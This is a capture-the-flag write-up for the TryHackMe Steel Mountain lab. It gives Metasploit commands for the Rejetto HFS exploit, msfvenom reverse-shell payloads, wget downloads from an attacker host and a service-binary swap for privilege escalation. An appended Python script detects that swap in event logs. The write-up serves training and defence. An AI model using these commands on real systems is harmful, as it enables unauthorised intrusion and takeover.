Steel Mountain

TryHackMe [Steel Mountain] [Write-Up]

Note: if any step doesn’t work, don’t give up; try to understand the process, have some patience, and try again. Happy Hacking!

Finding open ports and services:

root@prokunal: nmap -A -oN nmap.txt target-ip

There are two web servers: one on port 80 and another on port 8080. First, visit the website on port 80.

[Task 1] Question #1: here we find our “Employee of the month”.

See the picture below:

If you don’t know who he is 🧐, then watch the Mr. Robot series 🤪 (kidding). View the page source and you will find the answer to question #1.

[Task 2] Question #1: Moving to the next question, which asks what other port is running a web server: we found two ports, so you can try entering both.

[Task 2] Question #2: What file server is running? On port 8080, the server information is shown at the bottom left of the page; searching for it on Google gives the name of the file server. 🥳

[Task 2] Question #3: What is the CVE number of the exploit for this file server? Searching for the file server name together with its version quickly turns up both the exploit and its CVE number.

[Task 2] Question #4: Use Metasploit to get an initial shell. So, let’s go.

To exploit it with Metasploit, search for the vulnerable server name and you will find how to exploit it with Metasploit.

See the picture below:

Let’s go to Metasploit; we will use:

msf5> use exploit/windows/http/rejetto_hfs_exec
msf5> set rhosts <target ip>
msf5> set rport 8080 // because file server is running on port 8080
msf5> set lhost tun0
msf5> exploit

We get a shell as user bill. Now search for the user flag; to make this easier, first drop from the meterpreter shell into a normal shell (CMD) by typing ‘shell’.

Navigating to bill’s Desktop folder, we find our user.txt flag. 🥳

[Task 3] Question #1:

As instructed, type “load powershell” in meterpreter and then enter “powershell_shell”.

As instructed, upload PowerUp.ps1: we will use PowerShell to download the file from our attacking machine, so just start a Python web server there and fetch it, as in the picture below.

PS> wget http://<tun0 ip>:<port>/PowerUp.ps1 -OutFile PowerUp.ps1

After downloading the file, follow these steps (make sure you are in the folder where you saved PowerUp.ps1):

PS> . .\PowerUp.ps1
PS> Invoke-AllChecks

After it lists all the services, look for the entry whose CanRestart value is True. The ServiceName you find there is the answer. 😉

[Task 4] Question #4: Let’s find the root flag.

Create a Windows payload with msfvenom as instructed.

root@prokunal> msfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=4443 -f exe -o Advanced.exe

Background the first meterpreter session and set up a handler for the new payload, following these steps:

meterpreter> background
msf5 exploit(windows/http/rejetto_hfs_exec)> use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost tun0
msf5 exploit(multi/handler) > set lport 4443
msf5 exploit(multi/handler) > exploit -j
msf5 exploit(multi/handler) > sessions // show the current session number 
msf5 exploit(multi/handler) > sessions -i 3 // previous background session number 

After that, upload Advanced.exe to “C:\Program Files (x86)\IObit”.

meterpreter > cd C:/
meterpreter > cd "Program Files (x86)"
meterpreter > cd IObit
meterpreter > upload Advanced.exe

After uploading the exe to the “IObit” folder, type shell in meterpreter, stop the AdvancedSystemCareService9 service, copy Advanced.exe into the “Advanced SystemCare” folder, then start AdvancedSystemCareService9 again. That’s it; see the picture below.

Here we can see that session 4 has opened. Exit from cmd, background the meterpreter session and type sessions; session 4 is listed, and you can interact with it by typing “sessions -i 4”. That’s it.

Then go to “C:\Users\Administrator\Desktop”; here is your root flag. 🤭🥳

[Task 5] Moving to our next task: access and escalation without Metasploit.

First download the exploit and change the IP address in the script to your local tun0 IP. Then copy nc.exe from “/usr/share/windows-resources/binaries/nc.exe”; if you don’t have it, download it from here and make sure to rename it to nc.exe.

After that, start a Python web server on port 80 and a listener on port 443, then execute the downloaded exploit; see the picture below for a better understanding.


Now go to “C:\Users\bill\Desktop”, where you will see the user.txt flag.

Let’s run winPEAS; it may find some vulnerability. First download it from here, then fetch it onto the victim machine using wget.

After downloading winPEAS.exe, execute it in cmd by typing winPEAS.exe and wait; it will list a misconfiguration, namely “AdvancedSystemCareService9”.

Then create a Windows payload using msfvenom and download it into the “C:\Program Files (x86)\IObit” folder using wget.

root@prokunal: sudo msfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=4455 -f exe -o Advanced.exe

Then start a listener on port 4455, stop AdvancedSystemCareService9, copy Advanced.exe into the “Advanced SystemCare” folder and start AdvancedSystemCareService9 again. That’s it, you are in 😉. Now go to the “C:\Users\Administrator\Desktop” folder, where you will see root.txt.
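The escalation used in Task 4 and repeated here relies on a service whose binary folder is writable and which a low-privileged user can stop and start. From the defender’s side that same sequence is visible in the logs: a Service Control Manager event 7036 “entered the stopped state”, a file written into the service’s folder, then a 7036 “entered the running state”. The script below is an added example and not part of the write-up or any tool it uses; it correlates those three steps over a few constructed sample events. The pipe-separated “timestamp|event_id|message” line format, the service inventory (SERVICE_DIRS) and the event text are assumptions made for the example; the folder itself is the one the write-up targets.

```python
"""Detect 'stop service, overwrite its binary, start service' in event logs.

Added example (not from the write-up). Input lines use a constructed,
simplified 'timestamp|event_id|message' format standing in for two sources:
  - System log, Service Control Manager event 7036 (service state change)
  - Sysmon event 11 (FileCreate), which carries a 'TargetFilename:' field
"""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List

# Hypothetical inventory: service name as it appears in the 7036 message
# -> directory holding the service binary. The mapping is an assumption
# for this example; in practice it would be built from each service's ImagePath.
SERVICE_DIRS: Dict[str, str] = {
    "AdvancedSystemCareService9": r"C:\Program Files (x86)\IObit\Advanced SystemCare",
}

STATE_RE = re.compile(r"The (?P<svc>.+?) service entered the (?P<state>stopped|running) state")
FILE_RE = re.compile(r"TargetFilename: (?P<path>.+)$")


@dataclass
class Event:
    ts: datetime
    event_id: int
    message: str


def parse_line(line: str) -> Event:
    """Parse one constructed 'timestamp|event_id|message' line."""
    ts, event_id, message = line.split("|", 2)
    return Event(datetime.fromisoformat(ts), int(event_id), message.strip())


def in_service_dir(path: str, directory: str) -> bool:
    """Case-insensitive check that path lies inside directory (Windows paths)."""
    return path.lower().startswith(directory.lower().rstrip("\\") + "\\")


def detect_binary_swap(lines: List[str]) -> List[dict]:
    """Return one alert per service that was stopped, had a file written
    into its binary directory while stopped, and was then started again."""
    stopped_at: Dict[str, datetime] = {}   # service -> time it stopped
    writes: Dict[str, List[str]] = {}      # service -> files written while stopped
    alerts: List[dict] = []

    for line in lines:
        ev = parse_line(line)
        if ev.event_id == 7036:
            m = STATE_RE.search(ev.message)
            if not m:
                continue
            svc, state = m["svc"], m["state"]
            if state == "stopped":
                stopped_at[svc] = ev.ts
                writes[svc] = []
            elif state == "running" and svc in stopped_at:
                if writes[svc]:
                    alerts.append({
                        "service": svc,
                        "files": writes[svc],
                        "window_seconds": (ev.ts - stopped_at[svc]).total_seconds(),
                    })
                del stopped_at[svc]
                del writes[svc]
        elif ev.event_id == 11:
            m = FILE_RE.search(ev.message)
            if not m:
                continue
            # Only writes that land in a monitored folder while its service is down count.
            for svc, directory in SERVICE_DIRS.items():
                if svc in stopped_at and in_service_dir(m["path"], directory):
                    writes[svc].append(m["path"])
    return alerts


# Constructed sample events: the write-up's stop/copy/start sequence, plus benign noise
# (a Print Spooler restart and a log file written while the service is running).
SAMPLE_LOG = [
    "2020-01-01T10:00:00|7036|The AdvancedSystemCareService9 service entered the stopped state.",
    r"2020-01-01T10:00:05|11|Image: C:\Windows\System32\cmd.exe TargetFilename: C:\Program Files (x86)\IObit\Advanced SystemCare\Advanced.exe",
    "2020-01-01T10:00:09|7036|The AdvancedSystemCareService9 service entered the running state.",
    "2020-01-01T10:05:00|7036|The Print Spooler service entered the stopped state.",
    "2020-01-01T10:05:02|7036|The Print Spooler service entered the running state.",
    r"2020-01-01T10:10:00|11|Image: C:\Program Files (x86)\IObit\Advanced SystemCare\update.exe TargetFilename: C:\Program Files (x86)\IObit\Advanced SystemCare\update.log",
]

if __name__ == "__main__":
    for alert in detect_binary_swap(SAMPLE_LOG):
        print(alert)
```

Run it as-is and it reports a single alert for AdvancedSystemCareService9 with the one file written during the nine-second stop/start window; the Print Spooler restart and the log written while the service is running produce nothing. The same finding points at the fix: the folder under “Program Files (x86)” should not be writable by standard users, and a standard user should not hold stop/start rights on the service.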
